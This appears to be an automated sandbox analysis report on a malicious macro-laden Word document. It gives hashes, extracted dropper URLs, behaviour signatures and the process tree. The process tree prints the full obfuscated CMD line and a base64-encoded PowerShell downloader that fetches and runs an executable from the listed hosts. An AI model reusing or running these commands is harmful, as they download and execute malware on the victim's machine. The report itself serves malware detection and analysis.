Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
20-09-2024 23:15
General
-
Target
ee9f0612eb8917fdf710ac5cfe9ea64b_JaffaCakes118.doc
-
Size
81KB
-
MD5
ee9f0612eb8917fdf710ac5cfe9ea64b
-
SHA1
2668dcdeb2e63dfbc0d2ccbaa6bb9845acd61aa5
-
SHA256
a1242f39611e428c9ab7135e2eca1202b9810c22851a528bdc29e4a03f2f0c12
-
SHA512
f859843d0ce47b97c967d1bd24c21e2ce93347fd342743feb71ecfa677d79bff8d748a34e351b1389a96302e74e379622b5b4ee94c399006343816f74fcce8d4
-
SSDEEP
1536:jptJlmrJpmxlRw99NBP+aEkCxaupItj8SWnQt:Nte2dw99f5upuj
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://4surskate.com/vKi
exe.dropper
http://riakom.com/T
exe.dropper
http://zavod-pt.com/T
exe.dropper
http://natco-pharma.com/PRBHaG
exe.dropper
http://bitwaopoznan.pl//gp6
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 3 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee9f0612eb8917fdf710ac5cfe9ea64b_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\CMD.exeCMD /v:^O^ ^ /R" ^Se^T ^ ^ ^h6^AV==^AAIAACA^g^A^A^IAAC^A^g^AAIAACA^g^AAI^AAC^AgA^A^IAACAgA^AI^AAC^A^9^B^Qf^AsHA^oB^wY^AQH^AhBw^YA^0HA^7A^w^aAE^GAlBgc^AI^G^A^7A^wV^A^YE^Ak^B^A^JAACAtBQZA^Q^H^A^JBQL^A^U^G^Ar^B^wb^AY^H^AuB^QS^As^DA^p^AwVAYE^A^kBA^JAAC^A^s^A^QQ^A^wEAoB^AJAgCA^l^BAbAk^GA^G^BA^Z^AE^G^AvBA^b^A4^GA^3B^wb^AQ^EAuA^g^Z^A8EAB^B^A^J^A^s^HA5BgcA^Q^HA^7^B^QKAQG^A^o^B^AV^A^QCA^g^Ag^bA^k^GA^g^AQQA^wE^A^oB^AJAgC^Ao^B^w^YAE^GAlBgc^A^8^G^A^m^B^wOAcC^A^lBA^e^AUG^Au^A^w^J^AsCApB^gc^A^g^F^A^k^A^w^K^AcC^AcBwJ^AsC^A^j^BQ^aAw^GAiBQ^d^A^AH^A6^A^gd^A4^GAlBA^J^A^0D^AX^B^gR^A^QG^A^kA^wOAcCA^y^AA^M^A^Q^DAnA^AI^A0^DA^gAQ^aA^IH^AYB^A^J^AsD^A^pAw^J^A^A^E^An^A^A^K^A^Q^HA^p^BAb^AAHA^TBgLAcCA^2^AAc^AcGAv^AwLA^wGAwB^g^LA^4GAh^B^g^bA^o^H^AvB^AcA^8^GAhB^wdAQH^ApB^g^Y^A^8C^AvAgO^A^A^HA0^BA^dAgG^AABwR^AE^GA^I^B^gQA^IF^AQ^B^wLA0^GAv^Bw^YA4CA^hB^Q^b^AIHA^hBA^a^AA^H^A^tAwbAM^GA0^BQY^A4GAvA^wL^A^o^D^A^wB^A^dA^QH^Ao^BA^Q^AQFAvAQ^bA8^G^Aj^B^gL^AQ^H^A^w^B^Q^LA^Q^G^Av^B^gdAEGA^6B^wLA8CA^6^AAc^AQ^HA^0^B^Aa^AAE^A^U^B^wL^A0G^AvB^w^YA^4C^At^Bwb^A^sG^A^h^B^Q^aA^IHAvA^wL^Ao^D^Aw^B^Ad^A^QH^Ao^BA^QAk^G^A^L^B^g^dA8C^A^tB^w^bAM^G^A^u^A^QZ^A^Q^H^Ah^Bwa^A^M^HA^y^B^Q^d^AM^HA^0^A^wLA^8CA^6AAc^A^QHA0^BA^aAcC^A9^AAZAg^G^AUB^AJ^AsDA^0^B^gb^AUGAp^BA^bAMEAi^BQ^Z^AcF^AuA^A^dA^U^G^A^O^B^A^I^AQH^AjB^Q^Z^AoG^A^iBw^bA0C^A^3BQZA^4^GA^9^A^g^Z^A^8E^A^B^BAJ^ ^e^-^ lle^hsr^e^wop&& ^F^or /^l %k ^iN ( ^8^81^ -^1^ ^ ^0)^Do ^s^ET u^f^y^d=!u^f^y^d!!^h6^AV:~ %k, 1!& i^f %k l^s^S ^1 C^aL^L %u^f^y^d:~ ^-^8^82% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JABBAE8AZgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABUAGgAZAA9ACcAaAB0AHQAcAA6AC8ALwA0AHMAdQByAHMAawBhAHQAZQAuAGMAbwBtAC8AdgBLAGkAQABoAHQAdABwADoALwAvAHIAaQBhAGsAbwBtAC4AYwBvAG0ALwBUAEAAaAB0AHQAcAA6AC8ALwB6AGEAdgBvAGQALQBwAHQALgBjAG8AbQAvAFQAQABoAHQAdABwADoALwAvAG4AYQB0AGMAbwAtAHAAaABhAHIAbQBhAC4AYwBvAG0ALwBQAFIAQgBIAGEARwBAAGgAdAB0AHAAOgAvAC8AYgBpAHQAdwBhAG8AcABvAHoAbgBhAG4ALgBwAGwALwAvAGcAcAA2ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABYAHIAaQAgAD0AIAAnADQAMAAyACcAOwAkAGQARgBXAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAFgAcgBpACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABoAEwAQQAgAGkAbgAgACQAVABoAGQAKQB7AHQAcgB5AHsAJABBAE8AZgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABoAEwAQQAsACAAJABkAEYAVwApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABkAEYAVwA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5241de0efd301d4f79431084c5d92343f
SHA165d281f0732cb18b50ba7fe13d68944b0a7cf7e2
SHA256aaad9b3ab92cd45845827d677c8079e0cd4f7fdc35b93b922d8b42d812d4b0fe
SHA512f2c69159f92eacb8ad167c894fa206efaa09abc4331041de71b075d7360e220d10817863c3855ee5eb0073539f94ec05bf938a34a882181645077ce0be451638
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
1024KB